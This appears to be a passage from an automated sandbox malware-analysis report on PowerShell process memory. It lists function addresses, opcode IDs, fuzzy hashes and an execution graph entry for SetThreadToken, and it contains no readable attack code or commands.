                                                                                          • Instruction Fuzzy Hash: 2DF0F976200604AFD760CF0AD985C27FBEDEBD4670719C55AE84A4B711C671EC42CAA0
                                                                                          Function 0496DEC1 Relevance: .0, Instructions: 34COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 78641e244549bf741e90e4537424642a78b93a619df84a082ff41679b03b84c6
                                                                                          • Instruction ID: bdf362770317e614cc8b8be1d3f40203f28637b07868fa282feb5bf5539a0b18
                                                                                          • Opcode Fuzzy Hash: 78641e244549bf741e90e4537424642a78b93a619df84a082ff41679b03b84c6
                                                                                          • Instruction Fuzzy Hash: D5F058353142818FC3128B2CD498C66BFFAAFCB62532901AAE186CF372CA21DC01D791
                                                                                          Function 04967968 Relevance: .0, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1cdfaa672eca2a6782732f57911998e1c01a863c4ff2e608a7e8e624a5d29450
                                                                                          • Instruction ID: 3bc76775afdbf1ba8648044c3a33b664ca7d04a5e0f9ccf456a3c05340f1e3d3
                                                                                          • Opcode Fuzzy Hash: 1cdfaa672eca2a6782732f57911998e1c01a863c4ff2e608a7e8e624a5d29450
                                                                                          • Instruction Fuzzy Hash: 9FF0A0317006149FD7149AAAE844A6FBBE9EBCC675B00457DE10AC7740DF71AD0187A0
                                                                                          Function 0301D998 Relevance: .0, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365316170.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_301d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 81c1d23cebce24f4505667b12325f36812d534de35ef54f0affb682517ddf375
                                                                                          • Instruction ID: 2e768a64110fc857cf5e1890b4cd25a4a0c005809a07fea2075fbc526292b95c
                                                                                          • Opcode Fuzzy Hash: 81c1d23cebce24f4505667b12325f36812d534de35ef54f0affb682517ddf375
                                                                                          • Instruction Fuzzy Hash: 55F06D75100A40AFD761CF06CD84D23BBF9EB85670B29C489E84A4B712C630FC02CFA0
                                                                                          Function 04967697 Relevance: .0, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d68c5fad284e8a5322642ac390226bfd84ccf6440f0325c08b36e02dcc54fe45
                                                                                          • Instruction ID: c0a364e373af534363af81330086ab0d925d87e45c6b80c1ed916ee058771531
                                                                                          • Opcode Fuzzy Hash: d68c5fad284e8a5322642ac390226bfd84ccf6440f0325c08b36e02dcc54fe45
                                                                                          • Instruction Fuzzy Hash: 90F0A039700104CFCB00EFBCD800AAA7BA6EBC835570641A5E50ACB315DF24DC028BD2
                                                                                          Function 049690E8 Relevance: .0, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 292694381a293324227953306911c4f1e8b8ba83aa1fb2011aac8aa219fbf684
                                                                                          • Instruction ID: 5a293c6dd0022116c49ae408ddd13551033b6066a2be8744edc7645bb7154cc6
                                                                                          • Opcode Fuzzy Hash: 292694381a293324227953306911c4f1e8b8ba83aa1fb2011aac8aa219fbf684
                                                                                          • Instruction Fuzzy Hash: 30F0A7796052048BE305EB65D0197EF77A6DFC5318F10816AC90A5B785CE3A7C05C7E1
                                                                                          Function 0496DD0F Relevance: .0, Instructions: 30COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 451b185550bfc663f184adf0e56c1f7f79039f24eb4a86d573461456fd072090
                                                                                          • Instruction ID: 8f773f7a0b613fadec17306d04aab988473a749a6ebc7150ae0a50c5c464d4ab
                                                                                          • Opcode Fuzzy Hash: 451b185550bfc663f184adf0e56c1f7f79039f24eb4a86d573461456fd072090
                                                                                          • Instruction Fuzzy Hash: 47E0E5352057905BC312962DA8148DE7FEA8EC223130842AED04ADB602CE54980687E2
                                                                                          Function 0496DED0 Relevance: .0, Instructions: 30COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 79fe12b989f30899958d27682dfc1be5e9e69dd3acdda119fb1ccdc238444c11
                                                                                          • Instruction ID: fccb765bfc543ec75afa7b0f7ffb40c66daa964a9d1474712180b30fd92fc083
                                                                                          • Opcode Fuzzy Hash: 79fe12b989f30899958d27682dfc1be5e9e69dd3acdda119fb1ccdc238444c11
                                                                                          • Instruction Fuzzy Hash: 38E0E5393101118F87109F1DD498C66BBEAEFCE66536911AAF54ADB361DA61EC018B90
                                                                                          Function 04969158 Relevance: .0, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 62f6e3c338fc5962e5d9637062968948b98193865955405ac2f4cace8614cac4
                                                                                          • Instruction ID: cc7000a0d5953f3bca771e84ea86eb5cfa0050a6e8d92417948db9d519ded956
                                                                                          • Opcode Fuzzy Hash: 62f6e3c338fc5962e5d9637062968948b98193865955405ac2f4cace8614cac4
                                                                                          • Instruction Fuzzy Hash: AEF05E70A0A3504FD7619BB8E4AC7DA7FF5EB42310F0444AED54ACB682CB356881CB50
                                                                                          Function 0496F460 Relevance: .0, Instructions: 27COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2f6b72910f073d107743d152ef61396af89d9d9605afe395eec4721722644388
                                                                                          • Instruction ID: 23aa3b814a78a8148696ee3c7098c12b61eba16f90d478e553e4ca2ef62ca70e
                                                                                          • Opcode Fuzzy Hash: 2f6b72910f073d107743d152ef61396af89d9d9605afe395eec4721722644388
                                                                                          • Instruction Fuzzy Hash: 8CF0E2319002859ECB60CFBD884516AFFE0EB0A32471482BECD54C7215E7326402C7C1
                                                                                          Function 0496DD60 Relevance: .0, Instructions: 26COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9f5f62b6364e6f05e2d17f9434ec7e99efcea759d69ed238ca0bfa86978a24ff
                                                                                          • Instruction ID: b45551497869ee43e43713d7a690fc243fff05c3c7e94f187f7ef0e426bf496f
                                                                                          • Opcode Fuzzy Hash: 9f5f62b6364e6f05e2d17f9434ec7e99efcea759d69ed238ca0bfa86978a24ff
                                                                                          • Instruction Fuzzy Hash: 51E02231B041809BC70AC6ACE4848E8BFA2DFC8220F0489BED44B9B321CA3169069791
                                                                                          Function 04969168 Relevance: .0, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4e90bc2e8459adc06d4341f1578bfe1139bf7b992b4418789b709c7ab68ab6a1
                                                                                          • Instruction ID: b31875f3a8f22e5214dbb352f8089455704d83ce9484234967d41011a074c5e3
                                                                                          • Opcode Fuzzy Hash: 4e90bc2e8459adc06d4341f1578bfe1139bf7b992b4418789b709c7ab68ab6a1
                                                                                          • Instruction Fuzzy Hash: EAF039709013044BD3609BB8E89879A7BE9EB84310F004469E50EC7640DB3568808B90
                                                                                          Function 0496AF88 Relevance: .0, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: db2b78308e5888afdbcb79c90b1fee1c629ad404ec65f71bf7e9b14218cf7af3
                                                                                          • Instruction ID: 04f1ef36dbda40f707daed760f67e1f9f739ab84dad5a6b0ef87f26c7ce60c72
                                                                                          • Opcode Fuzzy Hash: db2b78308e5888afdbcb79c90b1fee1c629ad404ec65f71bf7e9b14218cf7af3
                                                                                          • Instruction Fuzzy Hash: 4CE0862570D2D01A9B17913D64604695FE64AC722431D80FED485CB253C8458C068352
                                                                                          Function 04968972 Relevance: .0, Instructions: 24COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 719680bfe3059035c6abeec2f5ce5e3f09757e72cc752c47963b8f7193c1eab2
                                                                                          • Instruction ID: 06a050bee0bfd31fd6044bf903bf8b405b343473c7ccf1d0c22c7d6cfbdd3215
                                                                                          • Opcode Fuzzy Hash: 719680bfe3059035c6abeec2f5ce5e3f09757e72cc752c47963b8f7193c1eab2
                                                                                          • Instruction Fuzzy Hash: A4E0DF3A70126187CB0A6B74A00C2EE3A66EBC4326F08442ED60687641CF782812C3D8
                                                                                          Function 04968978 Relevance: .0, Instructions: 24COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7737128d00edb81694bf655b2354fd81357d11149ef8626514f36183cd9806bd
                                                                                          • Instruction ID: a55fac02bdfcfe44d7c20dd24d60e3633ea7059b06aa3d2b847f4ff3831b447a
                                                                                          • Opcode Fuzzy Hash: 7737128d00edb81694bf655b2354fd81357d11149ef8626514f36183cd9806bd
                                                                                          • Instruction Fuzzy Hash: 2EE0DF3530532547CB092774A40C2EE7A5AEBC5724F04442ED60683342CF68681183D9
                                                                                          Function 04969550 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a1071b033942646d7ccd3d2d6e2d90918128928e97892d50d8d084155c83ad6d
                                                                                          • Instruction ID: 8affe1caf3059a3d82d9b465035a4487024aa9334fbd37872aadeb8e6640e544
                                                                                          • Opcode Fuzzy Hash: a1071b033942646d7ccd3d2d6e2d90918128928e97892d50d8d084155c83ad6d
                                                                                          • Instruction Fuzzy Hash: EFD05E12703121171664B0BA29006BBA5CF8BC44E970500369E0BC7242EC54EC0243F1
                                                                                          Function 04969549 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b7a9cb861d4a123740d57ec724ae399dd8ad40002df91df233d3815ce952cf3d
                                                                                          • Instruction ID: 42619d328cc055ee91a7e25259f1fb54fac01ba6f896a448a8f30f4851b97d58
                                                                                          • Opcode Fuzzy Hash: b7a9cb861d4a123740d57ec724ae399dd8ad40002df91df233d3815ce952cf3d
                                                                                          • Instruction Fuzzy Hash: BCD05E26743021072AB4B1B92A506BF44CF8BC40AE309003B9A0BD7341EC64EC0683E1
                                                                                          Function 0496DD20 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 357a818c1855eb7846d4816c522a22fca8dcc4d166204943f9fc8e254574e79c
                                                                                          • Instruction ID: e53d767ef528378d1843c7180a62a13915876f835e635fb6fcafb9ae4f5a33fe
                                                                                          • Opcode Fuzzy Hash: 357a818c1855eb7846d4816c522a22fca8dcc4d166204943f9fc8e254574e79c
                                                                                          • Instruction Fuzzy Hash: 27E0C236300710478226A61EB81089F7BDFDFC5671354467EE01AC7704DE64ED0247E5
                                                                                          Function 0496DD70 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                          • Instruction ID: 8b63fbf57a5b390e680ebee163a2122b19b09b4111763a643f2d8c6a003a2219
                                                                                          • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                          • Instruction Fuzzy Hash: CAE08631B00014978B089599D4544D9F7A6DBCC220F04847ED91AA7340DA32691686D1
                                                                                          Function 04968739 Relevance: .0, Instructions: 18COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 510105bc874c7f6c23f3a0ec03cc1cc53eb11d87687a126686a46adb72d62139
                                                                                          • Instruction ID: 8c2549f2000e1d100782b655847aba68ca7d7e3f7765c9ba2a3daced0ae280e2
                                                                                          • Opcode Fuzzy Hash: 510105bc874c7f6c23f3a0ec03cc1cc53eb11d87687a126686a46adb72d62139
                                                                                          • Instruction Fuzzy Hash: 40E08631E06149CBCB49EBB4F4594ED7F30EB51301F00009DE51352991DA70164ACBC0
                                                                                          Function 04968800 Relevance: .0, Instructions: 17COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f4a272ba439f7d6e23047165f67e1ed3fdcc24ecf54561659e01b2c359ca35d0
                                                                                          • Instruction ID: 314a61ae0fea51735c76b579a5f25a5a6c5f263deb3370ae90f55762e2f735d0
                                                                                          • Opcode Fuzzy Hash: f4a272ba439f7d6e23047165f67e1ed3fdcc24ecf54561659e01b2c359ca35d0
                                                                                          • Instruction Fuzzy Hash: A6E086309093468FC745EFA4E14546EBFB1EB85305F0045AEE849D7746D6306955DBC1
                                                                                          Function 0496F470 Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                          • Instruction ID: 7bb79d50f13ecb429986bd138564ae7013cb38c7de2c8d2bd1de23b191a77eae
                                                                                          • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                          • Instruction Fuzzy Hash: ACD067B0E042099F8780EFADD94156EFBF4EB48300F6085BA8919E7301F7329A12CBD1
                                                                                          Function 04967EA0 Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2fa1417ebf712e4c6613e0cbd3c42da7c5bc048c7d2ae638242ff634bd0f3c82
                                                                                          • Instruction ID: 881ce42f96c2cc5e719e87835197974e1e95cb3586e5b2c8033b50b4d6dd6d37
                                                                                          • Opcode Fuzzy Hash: 2fa1417ebf712e4c6613e0cbd3c42da7c5bc048c7d2ae638242ff634bd0f3c82
                                                                                          • Instruction Fuzzy Hash: A4D05E2664D3C15FDF1797354D6A1167F755B42100B0984DEC096CF4D6C964540ACB12
                                                                                          Function 04968748 Relevance: .0, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dcfc77fc52846d27c3516d594b1122c92c55e81ba58acf5e90c3dc8a5ab560a9
                                                                                          • Instruction ID: c10b8ac88330e6ede4129a537fba6588ac1a3c9e51f0e88174bb1c88a4e0957f
                                                                                          • Opcode Fuzzy Hash: dcfc77fc52846d27c3516d594b1122c92c55e81ba58acf5e90c3dc8a5ab560a9
                                                                                          • Instruction Fuzzy Hash: 2BD0673190620DCBCB48EBA5F85A4FEBB78FB54301F40416DE91752591EB312A5ACAC5
                                                                                          Function 04968810 Relevance: .0, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ae4832a36e35a725891e20ba2f60879e4ffd5b97100bc9f45ff71acfb1d10b13
                                                                                          • Instruction ID: 17d6759177977d77e1d924e1ad6065b89bd81c215b9b70d8a5f8c6f7740d471a
                                                                                          • Opcode Fuzzy Hash: ae4832a36e35a725891e20ba2f60879e4ffd5b97100bc9f45ff71acfb1d10b13
                                                                                          • Instruction Fuzzy Hash: ADD01234A0920A8F8744EF64E44646EBBB5E744301F004569D94593741EA307801CBC1
                                                                                          Function 04967932 Relevance: .0, Instructions: 11COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 22066135868a33af6f0c51b105780a66987fe1ac7044bfd2a4145b4a2bed31ce
                                                                                          • Instruction ID: a0507e4702750d5b9635abc6c04b7e98b38f5e0d37a1bbdb9a455f85b8d25bdd
                                                                                          • Opcode Fuzzy Hash: 22066135868a33af6f0c51b105780a66987fe1ac7044bfd2a4145b4a2bed31ce
                                                                                          • Instruction Fuzzy Hash: B4C012745893849BCB655F74A8C9D143F546B02211B0445DCD8861E2A7CAB28044CF00
                                                                                          Function 04967940 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3e8b25f7b97e859fabdf1e0d958270f7cd214fa736d0b2017d6171409531fff1
                                                                                          • Instruction ID: e53f105d7b63aaeb4ec67dea164d3edc946d5e1e54b184b30c9512549005c839
                                                                                          • Opcode Fuzzy Hash: 3e8b25f7b97e859fabdf1e0d958270f7cd214fa736d0b2017d6171409531fff1
                                                                                          • Instruction Fuzzy Hash: 35B092301857488FC258AF75E804814732DBB4421538004A8E81E0A2A6CEB6E884CA44

                                                                                          Execution Graph

                                                                                          Execution Coverage:5.9%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:3
                                                                                          Total number of Limit Nodes:0
                                                                                          execution_graph 21254 8a16428 21255 8a1646b SetThreadToken 21254->21255 21256 8a16499 21255->21256

                                                                                          Executed Functions

                                                                                          Function 04A2B490 Relevance: 2.8, Strings: 2, Instructions: 252COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 597 4a2b490-4a2b4a9 598 4a2b4ab 597->598 599 4a2b4ae-4a2b7f5 call 4a2acbc 597->599 598->599
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2406924637.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_4a20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: {YQn^$YQn^
                                                                                          • API String ID: 0-1145144706
                                                                                          • Opcode ID: 17bd73da200a12baf10b0facd8c30149a98d8cb3a90d6e3e41aff42b6d355f9a
                                                                                          • Instruction ID: c86cb768099c376333dac0ec302d2704b57f775df6091b03711803e0c7878332
                                                                                          • Opcode Fuzzy Hash: 17bd73da200a12baf10b0facd8c30149a98d8cb3a90d6e3e41aff42b6d355f9a
                                                                                          • Instruction Fuzzy Hash: E4918E30F016559BEB19EFB989116AFBBF2EFC4600B408A1DD516AB340DF74AD018BD6
                                                                                          Function 07702308 Relevance: 15.4, Strings: 11, Instructions: 1639COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2426134958.0000000007700000.00000040.00000800.00020000.00000000.sdmp, Offset: 07700000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_7700000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: p5wk$piOk$piOk$piOk$piOk$piOk$|,Qk$#wk$$wk$}l$}l
                                                                                          • API String ID: 0-301268479
                                                                                          • Opcode ID: 976b674083a10652272486750c7e403ae0b6bc13c98def1195a539a2f3c5175c
                                                                                          • Instruction ID: bc4f3a1ad6c6358bc65c4a461a4ad580f101991408e06297ceaba552d9b600e5
                                                                                          • Opcode Fuzzy Hash: 976b674083a10652272486750c7e403ae0b6bc13c98def1195a539a2f3c5175c
                                                                                          • Instruction Fuzzy Hash: 30C23AB2B04246DFDB258B78C8047AABBE1BFC6290F14887AD505CB6D2DB71D845C7E1
                                                                                          Function 077017B8 Relevance: 2.8, Strings: 2, Instructions: 338COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
